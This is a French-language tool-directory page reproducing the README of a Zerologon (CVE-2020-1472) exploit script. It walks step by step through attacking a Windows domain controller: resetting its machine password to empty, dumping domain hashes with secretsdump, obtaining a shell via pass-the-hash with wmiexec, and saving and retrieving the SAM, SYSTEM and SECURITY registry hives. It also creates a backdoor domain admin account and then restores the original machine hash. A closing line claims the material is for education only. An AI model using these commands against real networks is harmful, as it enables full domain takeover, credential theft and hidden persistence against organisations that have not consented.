Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
zerologon — zerologon script to exploit CVE-2020-1472 CVSS 10/10 | Kitploit
Outils/GitHubGitHub/wrathfuldiety/zerologon
Password CrackingPrivilege EscalationVulnerability AnalysisExploitationLateral MovementPost-ExploitationPenetration TestingLearning & Education
GitHubwrathfuldiety/zerologon

zerologon

zerologon script to exploit CVE-2020-1472 CVSS 10/10

Voir le dépôt
2il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

zerologon

zerologon script pour exploiter CVE-2020-1472 CVSS 10/10 Code d'exploitation basé sur https://www.secura.com/blog/zero-logon et https://github.com/SecuraBV/CVE-2020-1472. Recherche originale et scanner par Secura, modifications par RiskSense Inc. https://github.com/risksense/zerologon

Pour exploiter, supprimez toutes les installations précédentes d'Impacket et installez Impacket depuis https://github.com/SecureAuthCorp/impacket/commit/b867b21 ou plus récent.

apt update

apt remove --purge impacket-scripts python3-impacket apt autoremove

git clone https://github.com/rthalley/dnspython.git sudo python3 setup.py install cd .. git clone https://github.com/SecureAuthCorp/impacket.git cd impacket sudo python3 setup.py install git clone

Ensuite, faites :

python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

Si cela réussit, vous pourrez alors :

sudo secretsdump.py -just-dc domain/hostname\$@ip

Appuyer sur 'Entrée' à l'invite de mot de passe vous permettra de passer, ce qui devrait vous donner le hash de l'administrateur de domaine. Après avoir cela, utilisez wmiexec.py sur le DC cible avec un identifiant issu de secretsdump

wmiexec.py domain/Administrator@ip -hashes hash

et faites

reg save HKLM\SYSTEM system.save
get system.save
del /f system.save

reg save HKLM\SAM sam.save
get sam.save
del /f sam.save

reg save HKLM\SECURITY security.save
get security.save
del /f security.save

Et ensuite vous pouvez créer un nouveau compte administrateur au cas où,

net user myadmin Hello1234 /ADD /DOMAIN

et ajoutez le nouveau compte au groupe des administrateurs de domaine pour obtenir tous les privilèges,

net group "Domain Admins" myadmin /ADD /DOMAIN

et probablement exit maintenant depuis C:>

Ensuite vous pouvez exécuter

sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Et cela devrait vous montrer le hash NT d'origine du compte machine. Vous pouvez alors réinstaller ce hash de compte machine d'origine dans le domaine en exécutant

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

Réinstaller le hash d'origine est nécessaire pour que le DC continue de fonctionner normalement.

Et juste pour vérifier si le processus de restauration a fonctionné,

sudo secretsdump.py -just-dc domain/hostname\$@ip

et appuyer sur 'Entrée' à l'invite de mot de passe ne fonctionnera plus.

Et voilà, nous avons terminé.

Bonne chasse.

AVERTISSEMENT : Ceci est purement à des fins éducatives, je ne serai pas tenu responsable des actions ou de leurs conséquences PIRATER L'APPAREIL DE QUELQU'UN D'AUTRE EST ILLÉGAL ET EST PUNI PAR LA LOI.

Télécharger l’outil